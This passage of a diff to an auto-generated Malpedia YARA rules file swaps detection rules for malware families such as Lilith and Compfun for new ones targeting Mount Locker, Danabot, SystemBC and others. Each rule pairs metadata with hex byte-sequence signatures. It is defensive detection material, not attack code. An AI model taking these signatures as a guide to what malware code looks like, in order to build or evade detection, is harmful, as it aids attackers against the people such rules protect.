"https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.salgorea_auto.yar#L1-L163" license_url = "N/A" - logic_hash = "94fbd52db4d5481176ad7bfd7bb74c96cb0ad2e3aa8f7b123dd0955d4f95f88c" + logic_hash = "a8561e214f866675e949632f523697275b0bd60d695b553a0e222be68943af7d" score = 75 quality = 75 tags = "FILE" @@ -161955,32 +164734,38 @@ rule MALPEDIA_Win_Xiangoop_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b801000000 d1e0 8b55f4 0fb6440208 25ff000000 } - $sequence_1 = { c1e903 8d540906 8b4508 8990e0010000 c745ec00000000 8b4d08 } - $sequence_2 = { ebe3 8b45f0 8b0c85a8b00110 8b45ec 807c082800 } - $sequence_3 = { c1e008 0bc8 ba01000000 6bc203 8b550c 0fb644020c 25ff000000 } - $sequence_4 = { 8955c8 6804010000 8d85bcfdffff 50 8b4dc8 } - $sequence_5 = { 81e2ff000000 b801000000 6bc800 8b4510 8854080c 8b4dec } - $sequence_6 = { c3 b001 c3 c705????????80a50110 b001 c3 68???????? } - $sequence_7 = { 8b45fc 8b4dfc 034804 894dfc e9???????? b801000000 8be5 } - $sequence_8 = { 890c02 8b45ec 83c001 8945ec 837dec08 7502 } - $sequence_9 = { 8b45f4 83c028 8945f4 ebcb } + $sequence_0 = { 8b5c240c 53 9d 8b5c2404 } + $sequence_1 = { 51 66b9b469 66f7f1 f7da } + $sequence_2 = { 51 6698 f7db 33d2 b889510000 b98c0b0000 } + $sequence_3 = { 66c1e303 f6d1 f8 6633d2 66b8b96a 66b9ada1 66f7f1 } + $sequence_4 = { 66c1e306 80eb38 80e6ee f8 f6d1 52 40 } + $sequence_5 = { 8b5c2404 f8 99 8b1424 f5 66f7d8 8b442410 } + $sequence_6 = { 66c1e804 8b44240c 0fbafa00 0fbcd2 } + $sequence_7 = { 8b5c240c 53 d50a 48 d40a 22c9 } + $sequence_8 = { a1???????? 8945cc 8d45cc 3930 } + $sequence_9 = { 8d87d8010000 50 8d83d8010000 50 } + $sequence_10 = { 8d8850040000 8d984c040000 8b4510 8b00 } + $sequence_11 = { 8d885c040000 8d9858040000 e9???????? 8b7508 } + $sequence_12 = { 8d87d8010000 50 e8???????? 59 59 85c0 } + $sequence_13 = { 8d87d8010000 50 8d83b0020000 50 e8???????? 59 } + $sequence_14 = { 8d8860010000 0fb701 a801 740a } + $sequence_15 = { 8d8840010000 8d9044010000 56 8b750c } condition: - 7 of them and filesize <246784 + 7 of them and filesize <2007040 } -rule MALPEDIA_Win_Lilith_Auto : FILE +rule MALPEDIA_Win_Mount_Locker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7c9f283d-efd5-5ce1-a88d-5c399c9e9911" + id = "6832e6a1-eaa1-5e1c-99c0-2c5304573141" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lilith_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mount_locker_auto.yar#L1-L152" license_url = "N/A" - logic_hash = "9246de5695a5f1adcfda29165a048565982f491bffcb4e11939fadd1e6d8bd64" + logic_hash = "bff6076907046250738924c00fe6ba5da63e4a09d46fe90acd3aa54210bff35b" score = 75 quality = 75 tags = "FILE" @@ -161994,32 +164779,38 @@ rule MALPEDIA_Win_Lilith_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ff15???????? 6857040000 898698210000 ff15???????? } - $sequence_1 = { e8???????? 8bce e8???????? 83c418 8bcf e8???????? 8d4dd0 } - $sequence_2 = { 8b0c85a84b4300 8b45e8 f644012880 7446 0fbec3 83e800 742e } - $sequence_3 = { 25f0070000 660f28a010e94200 660f28b800e54200 660f54f0 660f5cc6 660f59f4 660f5cf2 } - $sequence_4 = { 8b0485a84b4300 80640828fe ff33 e8???????? 59 e9???????? 8b0b } - $sequence_5 = { c60000 833d????????10 b8???????? c745cc01000000 0f4305???????? } - $sequence_6 = { e9???????? c745dc03000000 c745e0c8874200 e9???????? } - $sequence_7 = { c1fa06 8934b8 8bc7 83e03f 6bc830 8b0495a84b4300 8b440818 } - $sequence_8 = { 8b4d08 898814434300 68???????? e8???????? 8be5 } - $sequence_9 = { 660f122c8510a74200 03c0 660f28348520ab4200 ba7f3e0400 e9???????? 8bd0 } + $sequence_0 = { 81f900000780 7503 0fb7c0 3d2e050000 } + $sequence_1 = { f30f5905???????? 0f5ad0 66490f7ed0 e8???????? } + $sequence_2 = { 4d8bc8 4c8bc2 4c8bf2 8bf1 } + $sequence_3 = { 8bc8 81e10000ffff 81f900000780 7503 } + $sequence_4 = { 488b0b 41b902000000 4533c0 33d2 } + $sequence_5 = { 488d4df0 4889442428 4533c9 4533c0 } + $sequence_6 = { 488bcb 488b15???????? e8???????? 85c0 } + $sequence_7 = { 488364242000 4533c9 488b4c2458 33d2 c744243001000000 c744243c02000000 } + $sequence_8 = { 4c8bf2 8bf1 33d2 33c9 } + $sequence_9 = { ff15???????? 85c0 7509 f0ff05???????? } + $sequence_10 = { b905000000 ff15???????? 3d040000c0 7494 85c0 } + $sequence_11 = { 7505 e8???????? 833d????????00 7409 833d????????00 } + $sequence_12 = { 8d442430 68???????? 50 ffd7 } + $sequence_13 = { a1???????? 83f804 7515 68???????? } + $sequence_14 = { 8bf0 85f6 7424 6800010000 } + $sequence_15 = { ff15???????? 85c0 7409 f0ff05???????? eb1e 56 } condition: - 7 of them and filesize <499712 + 7 of them and filesize <368640 } -rule MALPEDIA_Win_Portdoor_Auto : FILE +rule MALPEDIA_Win_Dnspionage_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "84ef053f-8b45-5899-91c4-5c0973d7e3db" + id = "80d80ee2-7c3c-5a6f-84fc-982c0a0f58b9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.portdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.portdoor_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dnspionage_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "23b6dfc496aede71e92bc63441565950d5591602bef8ef2eba1715ff0ea58fc2" + logic_hash = "6f236089a9c79217d1f5a567e48544242146a1c819e624fb6aad3710206efaec" score = 75 quality = 75 tags = "FILE" @@ -162033,32 +164824,32 @@ rule MALPEDIA_Win_Portdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 83f8ff 8906 0f95c0 eb2f 807e5100 } - $sequence_1 = { 50 8d85fcf3ffff 50 e8???????? 8bf0 } - $sequence_2 = { ff5718 8903 6a04 59 8d4102 33d2 } - $sequence_3 = { 8945a8 eb04 8365a800 8b45a8 894590 834dfcff 8b4590 } - $sequence_4 = { 50 8b8528e5ffff 0f94c1 898d3ce5ffff 8b8d24e5ffff 8b0485b80f0210 ff3401 } - $sequence_5 = { 894224 6689424c 894248 88424e 8a01 88040b } - $sequence_6 = { 7e21 8b450c 6a00 2bc6 } - $sequence_7 = { 51 51 8d45f8 895df8 } - $sequence_8 = { e8???????? 8bf8 b8eeff0000 59 668907 8b450c 885f02 } - $sequence_9 = { e8???????? a1???????? 33c5 8945fc 53 8b5d08 8d85fdfbffff } + $sequence_0 = { f7470c00020000 7507 8bc8 e8???????? 894320 85c0 } + $sequence_1 = { 50 8d45f4 50 6a13 57 } + $sequence_2 = { 0f1f8000000000 8bc7 8d5001 8a08 40 84c9 75f9 } + $sequence_3 = { c7450c00000000 8d4d0c ba???????? 51 8d4df4 51 } + $sequence_4 = { 83f97f 7307 be7f000000 eb11 8bf7 8d4e01 0f1f00 } + $sequence_5 = { 33f6 397510 762c 8b45f0 } + $sequence_6 = { 8b4810 e8???????? a3???????? e9???????? } + $sequence_7 = { 57 8bfa 85f6 0f8487000000 85ff 0f847f000000 } + $sequence_8 = { 7202 8b12 56 52 8d8518feffff } + $sequence_9 = { 8bce 8903 83c408 c1e902 } condition: - 7 of them and filesize <297984 + 7 of them and filesize <786432 } -rule MALPEDIA_Win_Jripbot_Auto : FILE +rule MALPEDIA_Win_Danabot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7b1d247f-7cbb-5615-a25c-7a029e86230e" + id = "6c78b1f9-714b-5978-8883-c700c384c0f3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jripbot_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.danabot_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "e485f4c42ec7ab7e0d2df3f1cd3bb910f7710773a4391061675b3c77a4acf337" + logic_hash = "4cb498ddb7090d3a6017b222a7d9cd57acddd4317f82294d9c05727c52600ae4" score = 75 quality = 75 tags = "FILE" @@ -162072,34 +164863,34 @@ rule MALPEDIA_Win_Jripbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 48 3b442418 0f822bffffff 8b8c24fc010000 5f 5e 5b } - $sequence_1 = { c1e807 8807 02d2 885701 66c7060100 33c9 837b0401 } - $sequence_2 = { 8b5d08 c1eb08 23d8 0fb69b38834200 c1e608 33f3 8b5d0c } - $sequence_3 = { 8d742414 e8???????? 59 59 eb06 895c240c 33c0 } - $sequence_4 = { 33c0 8b8eb8000000 3bc7 0f95c0 6a02 884105 33db } - $sequence_5 = { 51 50 56 56 ff750c ff75fc ffd7 } - $sequence_6 = { 50 e8???????? 8b1d???????? 83c40c 8d442438 50 ff15???????? } - $sequence_7 = { 8b4004 894604 33c0 8b8c242c010000 5f 5e 5b } - $sequence_8 = { eb04 8b442430 8b4c241c 2b4c2418 ff742418 8b5c2438 } - $sequence_9 = { 7443 3bf8 743f 8b4368 397008 7537 8b4df4 } + $sequence_0 = { 7405 83e804 8b00 83f814 7e18 8b45fc 50 } + $sequence_1 = { c1e803 83e03f 83f838 730b ba38000000 } + $sequence_2 = { 8b03 50 8b44242c 50 6a14 } + $sequence_3 = { 8b45f8 85c0 7407 83e804 } + $sequence_4 = { 8b16 e8???????? 8b07 50 8b442428 50 6a0a } + $sequence_5 = { 50 6a14 688a4c2a8d 8bc6 8b4d00 8b17 } + $sequence_6 = { 3b85d0feffff 7452 8b85d0feffff 50 6a00 } + $sequence_7 = { 6a00 49 75f9 51 53 56 bb???????? } + $sequence_8 = { 8b0f 8b16 e8???????? 8b07 50 8b442454 50 } + $sequence_9 = { 56 57 8bf1 8955f8 8945fc 8d45fc } condition: - 7 of them and filesize <507904 + 7 of them and filesize <237568 } -rule MALPEDIA_Win_Stop_Auto : FILE +rule MALPEDIA_Win_Sakula_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fe824146-93e4-5101-ac02-1276fa1eda55" + id = "877a5bc8-1502-5d2d-ac89-d1f9991b4673" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stop_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sakula_rat_auto.yar#L1-L234" license_url = "N/A" - logic_hash = "d919a89d4ce45439e081288fd345725318b761c87669a03e35d3c6db03d1320c" + logic_hash = "5566117feff4531b6238852b1dd267d13dd172e7c51c8c4e9976cadb5e493558" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -162111,32 +164902,45 @@ rule MALPEDIA_Win_Stop_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 8d45e0 50 ffd6 85c0 75e2 6a64 } - $sequence_1 = { ffd0 5d c3 8b0d???????? 33d2 85c9 } - $sequence_2 = { 57 6a00 8bd9 6a00 6a12 ff33 } - $sequence_3 = { 56 57 6a00 8bd9 6a00 6a12 } - $sequence_4 = { ff750c ff7508 ffd0 5d c3 8b0d???????? } - $sequence_5 = { ff15???????? 50 e8???????? c745fc00000000 } - $sequence_6 = { 75e2 6a64 ff15???????? ffd3 } - $sequence_7 = { 68???????? 6a00 6a00 ff15???????? 33c9 894604 85c0 } - $sequence_8 = { 6a00 ff15???????? 33c9 894604 } - $sequence_9 = { 6a00 ff15???????? 33c9 894604 85c0 5e 0f95c1 } + $sequence_0 = { 6a00 6800010000 6a00 6a00 68???????? } + $sequence_1 = { 8bf0 56 6a01 57 53 } + $sequence_2 = { 57 56 e8???????? 8d7e10 8ad8 57 8bc7 } + $sequence_3 = { 33c9 85f6 7e15 8a0411 84c0 7409 } + $sequence_4 = { 53 e8???????? 83c40c 6a00 6a00 57 53 } + $sequence_5 = { 8bc7 e8???????? 83c408 833e01 } + $sequence_6 = { 50 e8???????? 83c404 32c0 5d } + $sequence_7 = { 53 e8???????? 56 e8???????? 83c41c 5f 5b } + $sequence_8 = { 66895db0 48895c2450 4889442458 4889442460 } + $sequence_9 = { ff15???????? 33d2 488bcb ff15???????? e8???????? 33c9 ff15???????? } + $sequence_10 = { 8b45d8 8b5de0 01d8 8945e0 6a01 e8???????? } + $sequence_11 = { 4c8bc6 33d2 33c9 448bc8 897c2428 48895c2420 ff15???????? } + $sequence_12 = { 0f8516010000 488d15e61c0000 41b804010000 48890d???????? ff15???????? ff15???????? 83f801 } + $sequence_13 = { 7459 68???????? 68???????? e8???????? 83f800 } + $sequence_14 = { 8945e4 83f800 0f843c010000 6a00 6a00 ff75ec } + $sequence_15 = { e8???????? 50 ff75f4 e8???????? 58 eb02 31c0 } + $sequence_16 = { 8a03 3c00 7414 b21a } + $sequence_17 = { ff15???????? 33d2 488d4deb 448d426c } + $sequence_18 = { ff15???????? 488bce 488bd8 ff15???????? 488364243800 488364243000 } + $sequence_19 = { e9???????? 31c0 7402 31c0 50 ff75fc e8???????? } + $sequence_20 = { ff9080000000 3bc6 741b 488b4dc7 488b01 } + $sequence_21 = { 6804010000 ff75fc 6a00 e8???????? ff75fc } + $sequence_22 = { 33d2 ff15???????? 3bc6 745f 4c8d4dcf } condition: - 7 of them and filesize <6029312 + 7 of them and filesize <229376 } -rule MALPEDIA_Win_Miragefox_Auto : FILE +rule MALPEDIA_Win_Merdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7d7cd6d5-44d9-5ffc-a5c9-9ff4ba40c5bc" + id = "a99af5cd-bc04-5bf5-95d0-af03ff89050f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.miragefox_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.merdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.merdoor_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "f8d9e523d9895537a03eee9c6c67877c75001719916af13d5bd2cc1c1b329b5b" + logic_hash = "b95cd242972456e72e114f53ab84ee24aaf18f568fbe98e73f19f67ea1e8459f" score = 75 quality = 75 tags = "FILE" @@ -162150,32 +164954,32 @@ rule MALPEDIA_Win_Miragefox_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 50 c6450805 e8???????? be1c810000 8d4508 56 } - $sequence_1 = { 7509 0fb68340f62a00 eb02 8bc3 5b c9 c3 } - $sequence_2 = { 8985f07fffff 6a00 0f94c0 83c023 8885ec7fffff 8d85e0f7feff } - $sequence_3 = { 7417 8bf9 c1ff05 83e11f 8b3cbd20f52a00 } - $sequence_4 = { 57 e8???????? 8d4604 6a19 } - $sequence_5 = { 6a00 50 e8???????? 8b4510 83c40c 8985147cffff } - $sequence_6 = { 6802800000 8d8520010000 53 50 e8???????? 8b4510 83c418 } - $sequence_7 = { 6800400000 50 ff75fc ff15???????? 8b8514010000 2b75f4 } - $sequence_8 = { b820080100 e8???????? 53 56 ff7518 6a00 6a01 } - $sequence_9 = { e8???????? 834dfcff 8d4dec e8???????? e9???????? bf18800000 } + $sequence_0 = { 5e 3bc8 7215 50 8d8398000000 50 6aff } + $sequence_1 = { 8d85f0fdffff 8bcb 50 e8???????? 8b4dfc f7d8 5f } + $sequence_2 = { 8ac1 eb04 b011 2ac1 f6d0 fec1 } + $sequence_3 = { 0f87af000000 8d8ee4020000 894df4 7443 8b01 8bf0 8bd0 } + $sequence_4 = { ffd7 8986c0000000 83bec400000000 750f 8d4588 } + $sequence_5 = { 3044159c 42 80f90f 72da 660f6f05???????? 32c9 f30f7f853cffffff } + $sequence_6 = { 85c0 751c 8d85ecfeffff 50 ff15???????? 8b400c 8b00 } + $sequence_7 = { 85c0 7403 8d3410 8b440b10 85c0 7438 } + $sequence_8 = { 53 56 8bf1 57 83cfff 8d9eec020000 53 } + $sequence_9 = { 8986c0000000 83bec400000000 750f 8d4588 50 ff7604 ffd7 } condition: - 7 of them and filesize <286720 + 7 of them and filesize <307200 } -rule MALPEDIA_Win_Lambert_Auto : FILE +rule MALPEDIA_Win_Systembc_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1c692e32-84a7-5d90-ba02-61a84edfcff0" + id = "33299700-4e02-5584-bb63-8a8197d8417b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lambert_auto.yar#L1-L166" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.systembc_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "9e5ed22ba49a751e07cf4ea652d26902b7b8b831105840a55340dbe6f75e09b9" + logic_hash = "29f113c1b3510221b57bbc147c9c5017608a490a95fbc04ce80eea2621980153" score = 75 quality = 75 tags = "FILE" @@ -162189,38 +164993,32 @@ rule MALPEDIA_Win_Lambert_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33f2 8b55e8 33ce 33d1 } - $sequence_1 = { 4e 8b1f 8919 2bf0 } - $sequence_2 = { 3bd8 0f826f010000 8a07 8801 41 47 } - $sequence_3 = { 3bd8 0f82a4000000 83fe06 0f822cffffff } - $sequence_4 = { 55 8bec 56 8b7510 c1fe04 } - $sequence_5 = { 2bc1 3bc7 0f82e5010000 8b4508 2bc2 8d7701 } - $sequence_6 = { 33f1 8b4de4 33ce 314de8 } - $sequence_7 = { 3b7d10 724d 3bf9 7349 8bc3 2bc1 } - $sequence_8 = { 6a00 e8???????? 8945fc 8b45fc 8945f4 8b4df4 8b55f4 } - $sequence_9 = { 50 e8???????? 8945e8 8b4de8 3b4d10 750f } - $sequence_10 = { 83ec18 8b450c 8b4814 894df0 8b550c 8b4508 } - $sequence_11 = { 741f 8b4df8 c1e90d 8b55f8 } - $sequence_12 = { ebce 8b45f8 8be5 5d c20400 55 8bec } - $sequence_13 = { 8b510c 8b421c 8945f4 8b4df4 894df0 } - $sequence_14 = { 3b5118 7334 8b45fc 8b4dec } - $sequence_15 = { e8???????? 8945f8 8b4df8 3b4d08 7508 8b55f4 } + $sequence_0 = { 8b8e88010000 8b968c010000 8bb690010000 8945e4 895df4 } + $sequence_1 = { 52 6a00 6a00 6a00 ffb568f9ffff } + $sequence_2 = { 668b9554f9ffff 6a00 6a00 6a03 6a00 6a00 } + $sequence_3 = { 898568f9ffff c7856cf9ffff00040000 8d853cf9ffff 50 6a00 6a00 } + $sequence_4 = { 81c200008000 81c200100000 81c200200000 6a00 52 } + $sequence_5 = { 8d851cf4ffff 50 6800010000 57 ffb530f4ffff } + $sequence_6 = { 50 e8???????? ffd0 8b85f4feffff } + $sequence_7 = { 43 3b5dfc 7296 33c0 5e 5f } + $sequence_8 = { 668b9554f9ffff 6a00 6a00 6a03 6a00 } + $sequence_9 = { 57 56 8b7d10 33c0 } condition: - 7 of them and filesize <1212416 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Compfun_Auto : FILE +rule MALPEDIA_Win_Remsec_Strider_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b70b97d4-0cf0-525a-92ea-8899bccf1319" + id = "5cf05a79-eeb6-5c58-8271-14cb9c81c326" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.compfun_auto.yar#L1-L161" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.remsec_strider_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "a0b696c7a840205849cf5ac2e95df1021718fd8d1c1053a2c6b648baa042ec58" + logic_hash = "69887265225a27114e8e9d83252b405933e8e0558a06ab3222eee20510a77720" score = 75 quality = 75 tags = "FILE" @@ -162234,38 +165032,32 @@ rule MALPEDIA_Win_Compfun_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d857cfeffff 50 8d857cffffff 50 e8???????? 59 50 } - $sequence_1 = { c7460c65726174 c746106f722063 c746146c617373 c6461800 8bc6 5e } - $sequence_2 = { 56 e8???????? 83c40c c74608697a6520 c70647657446 c74604696c6553 c6460b00 } - $sequence_3 = { c7460472656174 c7460865557365 c7460c72546872 c6461300 } - $sequence_4 = { e8???????? 83c40c c7460c33322020 c706496e7072 } - $sequence_5 = { 6880000000 6a00 56 e8???????? 83c40c c70647657446 c74604756c6c50 } - $sequence_6 = { c6460f00 8bc6 5e 5d c3 55 } - $sequence_7 = { c7460825202020 c70625415050 c7460444415441 c6460900 8bc6 5e } - $sequence_8 = { 034c2460 488b442450 894820 488b4c2450 } - $sequence_9 = { 03c1 4863d0 488b4c2430 488b442438 } - $sequence_10 = { 03c1 89442420 8b442420 83c001 } - $sequence_11 = { 03c1 89442420 8b4c2438 488b442450 } - $sequence_12 = { 03c1 89442420 8b542438 486bd218 } - $sequence_13 = { 034c242c 488b442470 894820 488d542440 } - $sequence_14 = { 03c1 89442434 8b442430 39442434 } - $sequence_15 = { 0344242c 8bc8 e8???????? 4889442448 } + $sequence_0 = { 74f7 8b4130 2dbc97e889 f7d8 1bc0 f7d0 } + $sequence_1 = { 6a1a 58 6a10 8945e4 8945e8 58 } + $sequence_2 = { c9 c20800 55 8bec b804000100 } + $sequence_3 = { 85c9 74f7 8b4130 2dbc97e889 } + $sequence_4 = { 6803010000 50 ff15???????? 83c414 8d45f0 50 } + $sequence_5 = { 0d00000040 50 8d85e8fdffff 50 } + $sequence_6 = { ebf5 8b432c ff30 68???????? } + $sequence_7 = { 0510010000 68???????? 6803010000 50 } + $sequence_8 = { ff772c ff15???????? 85c0 7512 ff15???????? 8bc8 } + $sequence_9 = { 85ff 7415 83ff05 7410 68???????? 6a02 } condition: - 7 of them and filesize <402432 + 7 of them and filesize <344064 } -rule MALPEDIA_Win_Agfspy_Auto : FILE +rule MALPEDIA_Win_Gold_Dragon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "aa314a06-4040-546e-b9cd-d5bfa676b734" + id = "eec5e3d6-5655-50ac-8840-a288ffff9f65" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.agfspy_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gold_dragon_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "e751bb17a85204a5afd3cbca773cdafd25186332344d59ffe01d62696a3fda9d" + logic_hash = "eed1b3c473c88d18a03100aac4bac22cf30de04dad45247c9c63eb23fa6434a1" score = 75 quality = 75 tags = "FILE" @@ -162279,32 +165071,32 @@ rule MALPEDIA_Win_Agfspy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7527 83fefd 7431 8a4101 3a4201 751a 83fefe } - $sequence_1 = { 85f6 7539 8d45c0 50 8d45d4 50 e8???????? } - $sequence_2 = { 731d 8d4101 83fe10 8945d0 8d45c0 0f4345c0 881408 } - $sequence_3 = { c645fc04 8d45b0 837dc408 51 0f4345b0 8d4d84 50 } - $sequence_4 = { e8???????? eb46 8b4720 85c0 741f 837e1410 8bce } - $sequence_5 = { 2bc1 83c0fc 83f81f 7724 e9???????? 32c0 8b4df4 } - $sequence_6 = { 837de808 0f4375d4 3b55cc 752f 85d2 7413 2bf0 } - $sequence_7 = { 50 e8???????? 8ac8 8b45b4 83f80c 74e7 } - $sequence_8 = { 0fb602 eb05 8b01 ff501c 83f8ff 742f 8b0e } - $sequence_9 = { d1f8 51 8bcb 8d0442 50 52 } + $sequence_0 = { e8???????? 8bc6 83e61f c1f805 59 8b048500954000 8d0cf6 } + $sequence_1 = { 85c0 a3???????? 0f848d030000 8b15???????? 68???????? } + $sequence_2 = { 0fb6fa 3bc7 7714 8b55fc 8a9200844000 } + $sequence_3 = { a3???????? 0f842d040000 8b15???????? 68???????? } + $sequence_4 = { a3???????? 0f8422030000 a1???????? 68???????? 50 ffd6 } + $sequence_5 = { 8b7d08 8d054c914000 83780800 753b b0ff } + $sequence_6 = { 8db60c844000 bf???????? a5 a5 59 } + $sequence_7 = { ffd6 85c0 a3???????? 0f84a2050000 } + $sequence_8 = { ffd6 85c0 a3???????? 0f84ef010000 68???????? ffd7 } + $sequence_9 = { 85c0 a3???????? 0f8424020000 8b15???????? 68???????? 52 } condition: - 7 of them and filesize <1482752 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Scout_Auto : FILE +rule MALPEDIA_Win_Rofin_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "782e8973-04d4-5ac6-ba73-37d8fadd11cc" + id = "1b07367d-380d-5a5b-bc33-dfe76ecfb58c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scout" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scout_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rofin_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "5102c52e17a0c63528d1a50969c6684ed49d0991b2b60fe184c02299aec673c2" + logic_hash = "8597563e9ea27355f4e9d99fcf2f4a72dc9ad41d82ef13adb90824429264b4c0" score = 75 quality = 75 tags = "FILE" @@ -162318,32 +165110,32 @@ rule MALPEDIA_Win_Scout_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d537c 41b888140000 488d4df0 e8???????? 41b904000000 } - $sequence_1 = { 498bf9 8b0a e8???????? 90 488d1d86780100 488d356f630100 } - $sequence_2 = { 736b 488bc3 488bf3 48c1fe06 4c8d2d4ef80000 } - $sequence_3 = { 4d8bf8 488bc6 48894df7 488945ef 488d0d36fbfeff 83e03f 458be9 } - $sequence_4 = { 488d1520d50000 b805000000 894520 894528 } - $sequence_5 = { 7566 b804000000 660f1f840000000000 488d8980000000 } - $sequence_6 = { e8???????? 33c0 488b8d90140000 4833cc e8???????? } - $sequence_7 = { c745dca8837182 0f1045d0 c744242801000000 8905???????? } - $sequence_8 = { 4c89742438 4c897c2430 ff15???????? 33d2 } - $sequence_9 = { 75dd 488d05e31b0100 483bd8 74d1 488bcb } + $sequence_0 = { 014df0 3b06 72b5 eb1a 8b45fc 69c01c010000 03c6 } + $sequence_1 = { 84c0 c706???????? 7417 8b4604 85c0 7410 } + $sequence_2 = { 8d442434 53 50 33d2 668b95d0030000 56 8d4c242c } + $sequence_3 = { c644244163 88542442 c644244528 885c2446 c64424473e c644244800 } + $sequence_4 = { 